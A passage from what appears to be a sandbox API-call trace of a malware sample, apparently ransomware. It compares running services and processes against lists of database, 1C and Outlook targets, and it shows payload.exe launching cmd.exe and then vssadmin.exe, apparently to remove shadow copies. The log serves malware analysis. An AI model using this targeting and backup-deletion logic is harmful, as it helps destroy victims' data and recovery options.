(lpString="SysMain") returned 7 [0051.654] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0051.654] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0051.655] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0051.655] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0051.655] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0051.655] lstrlenW (lpString="Themes") returned 6 [0051.655] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0051.655] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0051.655] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0051.655] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0051.655] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0051.655] lstrlenW (lpString="TrkWks") returned 6 [0051.655] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0051.655] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0051.655] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0051.655] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0051.655] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0051.655] lstrlenW (lpString="UxSms") returned 5 [0051.655] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0051.655] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0051.655] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0051.655] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0051.655] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0051.655] lstrlenW (lpString="VSS") returned 3 [0051.655] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0051.655] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0051.655] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0051.655] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0051.655] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0051.655] lstrlenW (lpString="WdiServiceHost") returned 14 [0051.655] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0051.655] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0051.655] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0051.655] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0051.656] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0051.656] lstrlenW (lpString="WdiSystemHost") returned 13 [0051.656] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0051.656] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0051.656] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0051.656] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0051.656] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0051.656] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0051.656] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0051.656] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0051.656] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0051.656] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0051.656] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0051.656] lstrlenW (lpString="Winmgmt") returned 7 [0051.656] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0051.656] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0051.656] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0051.656] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0051.656] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0051.656] lstrlenW (lpString="WPDBusEnum") returned 10 [0051.656] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0051.656] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0051.656] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0051.656] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0051.656] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0051.656] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x628500 | out: hHeap=0x5d0000) returned 1 [0051.656] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f4 [0051.659] Process32FirstW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0051.660] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0051.660] lstrlenW (lpString="System") returned 6 [0051.660] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0051.660] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0051.660] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0051.660] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0051.660] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0051.660] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0051.660] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0051.661] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0051.661] lstrlenW (lpString="smss.exe") returned 8 [0051.661] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0051.661] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0051.661] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0051.661] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0051.661] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0051.661] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0051.661] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0051.661] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0051.662] lstrlenW (lpString="csrss.exe") returned 9 [0051.662] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0051.662] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0051.662] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0051.662] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0051.662] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0051.662] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0051.662] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0051.662] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0051.663] lstrlenW (lpString="wininit.exe") returned 11 [0051.663] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0051.663] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0051.663] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0051.663] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0051.664] lstrlenW (lpString="csrss.exe") returned 9 [0051.664] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0051.664] lstrlenW (lpString="winlogon.exe") returned 12 [0051.665] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0051.665] lstrlenW (lpString="services.exe") returned 12 [0051.665] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0051.666] lstrlenW (lpString="lsass.exe") returned 9 [0051.666] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0051.667] lstrlenW (lpString="lsm.exe") returned 7 [0051.667] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.667] lstrlenW (lpString="svchost.exe") returned 11 [0051.668] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.668] lstrlenW (lpString="svchost.exe") returned 11 [0051.668] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.669] lstrlenW (lpString="svchost.exe") returned 11 [0051.669] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.670] lstrlenW (lpString="svchost.exe") returned 11 [0051.670] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.670] lstrlenW (lpString="svchost.exe") returned 11 [0051.670] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0051.671] lstrlenW (lpString="audiodg.exe") returned 11 [0051.671] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.672] lstrlenW (lpString="svchost.exe") returned 11 [0051.672] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.672] lstrlenW (lpString="svchost.exe") returned 11 [0051.672] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0051.673] lstrlenW (lpString="dwm.exe") returned 7 [0051.673] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0051.674] lstrlenW (lpString="explorer.exe") returned 12 [0051.674] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0051.675] lstrlenW (lpString="spoolsv.exe") returned 11 [0051.675] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0051.675] lstrlenW (lpString="taskhost.exe") returned 12 [0051.675] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.676] lstrlenW (lpString="svchost.exe") returned 11 [0051.676] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0051.677] lstrlenW (lpString="taskeng.exe") returned 11 [0051.677] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0051.677] lstrlenW (lpString="taskhost.exe") returned 12 [0051.677] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="carried trinity.exe")) returned 1 [0051.678] lstrlenW (lpString="carried trinity.exe") returned 19 [0051.678] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="heaven.exe")) returned 1 [0051.679] lstrlenW (lpString="heaven.exe") returned 10 [0051.679] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dell.exe")) returned 1 [0051.963] lstrlenW (lpString="dell.exe") returned 8 [0051.963] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="consequence lonely nato.exe")) returned 1 [0051.964] lstrlenW (lpString="consequence lonely nato.exe") returned 27 [0051.964] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gotten_commit_philip.exe")) returned 1 [0051.964] lstrlenW (lpString="gotten_commit_philip.exe") returned 24 [0051.964] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="til ear equal.exe")) returned 1 [0051.965] lstrlenW (lpString="til ear equal.exe") returned 17 [0051.965] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="itunes-bring.exe")) returned 1 [0051.966] lstrlenW (lpString="itunes-bring.exe") returned 16 [0051.966] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tide_instances_ee.exe")) returned 1 [0051.967] lstrlenW (lpString="tide_instances_ee.exe") returned 21 [0051.967] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="philadelphia.exe")) returned 1 [0051.967] lstrlenW (lpString="philadelphia.exe") returned 16 [0051.967] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="litigation_rows_careers.exe")) returned 1 [0051.968] lstrlenW (lpString="litigation_rows_careers.exe") returned 27 [0051.968] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ict virginia cameras.exe")) returned 1 [0051.969] lstrlenW (lpString="ict virginia cameras.exe") returned 24 [0051.969] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x438, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fraud stuck.exe")) returned 1 [0051.969] lstrlenW (lpString="fraud stuck.exe") returned 15 [0051.969] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="innovative-essential-very.exe")) returned 1 [0051.970] lstrlenW (lpString="innovative-essential-very.exe") returned 29 [0051.970] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attended.exe")) returned 1 [0051.971] lstrlenW (lpString="attended.exe") returned 12 [0051.971] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tolerance-cartridges.exe")) returned 1 [0051.971] lstrlenW (lpString="tolerance-cartridges.exe") returned 24 [0051.971] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pan physician.exe")) returned 1 [0051.972] lstrlenW (lpString="pan physician.exe") returned 17 [0051.972] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="yesterday_sagem_indexes.exe")) returned 1 [0051.972] lstrlenW (lpString="yesterday_sagem_indexes.exe") returned 27 [0051.973] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="graphsheadlinehull.exe")) returned 1 [0051.973] lstrlenW (lpString="graphsheadlinehull.exe") returned 22 [0051.973] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="over-celebrity.exe")) returned 1 [0051.974] lstrlenW (lpString="over-celebrity.exe") returned 18 [0051.974] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0051.974] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0051.974] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0051.975] lstrlenW (lpString="payload.exe") returned 11 [0051.975] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x970, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x964, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0051.976] lstrlenW (lpString="cmd.exe") returned 7 [0051.976] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0051.976] lstrlenW (lpString="conhost.exe") returned 11 [0051.976] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x970, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0051.977] lstrlenW (lpString="vssadmin.exe") returned 12 [0051.977] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0051.978] lstrlenW (lpString="VSSVC.exe") returned 9 [0051.978] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.979] lstrlenW (lpString="svchost.exe") returned 11 [0051.979] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0051.979] CloseHandle (hObject=0x1f4) returned 1 [0051.979] Sleep (dwMilliseconds=0x1f4) [0053.105] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x626e60 [0053.106] EnumServicesStatusExW (in: hSCManager=0x626e60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21aff44, 